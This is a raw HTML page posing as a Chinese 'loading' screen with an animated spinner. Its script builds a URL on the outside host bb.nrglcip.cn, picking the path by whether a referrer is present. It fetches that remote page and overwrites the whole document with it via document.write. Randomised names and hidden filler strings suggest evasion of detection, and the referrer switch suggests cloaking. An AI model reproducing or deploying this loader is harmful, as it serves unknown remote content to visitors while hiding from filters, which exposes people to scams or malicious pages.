<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .at6veFCLb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .at6veFCLb .r8lSkY {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .at6veFCLb .content {
            line-height: 50px;
            text-align: center
        }

        .at6veFCLb .img {
            width: 100%
        }

        .at6veFCLb .hdGn1wKp {
            text-align: center
        }

        .at6veFCLb .hdGn1wKp span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .at6veFCLb .hdGn1wKp span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .at6veFCLb .hdGn1wKp span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .at6veFCLb .hdGn1wKp span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .at6veFCLb .hdGn1wKp span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .at6veFCLb .hdGn1wKp span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .at6veFCLb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NRQ6U45mkE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZWfBgD = NRQ6U45mkE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZWfBgD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZWfBgD +".html?a=share";
		}
		
        P2m5ysH=url+"#"+new Date().getTime();
        P2m5ysH && function() {
            $.get(P2m5ysH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >sm32OAo6dEhWF</li>
<ul style='display:none' >kOq3nU5cTQZJREF8bGGDyEJFGvPg</ul>
<h1 style='display:none' >pT7Eb2Aaw9BH1gKiOB3yBTAu</h1>
<span style='display:none'>Mz465Qq5pzGTvcUChH3BtzJOZiIaZ7se4SCZNmzzxZQpcoBgZCt5aF1fhbaDlMeWvo</span><div class="at6veFCLb">
    <div class="r8lSkY">
        <div class="hdGn1wKp">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<div style='display:none'>zKCIFaRm7NyuQNeLj2nKjGg0py1eeX0Qqh5SnJ5yu3hb2EnmjHQOJJ0iOgqwjQOEDgqJG</div>
<li style='display:none' >q7aOJPDPlB8qCOnjmp2Ovgc</li>
<b style='display:none' >zivPxh5BwHdnRbsgGxFGfgc0FMQmjB4RGWgAtcv9IgNQhI18knThqGgIOoO</b>
<li style='display:none' >q7aOJPDPlB8qCOnjmp2Ovgc</li></body>
</html>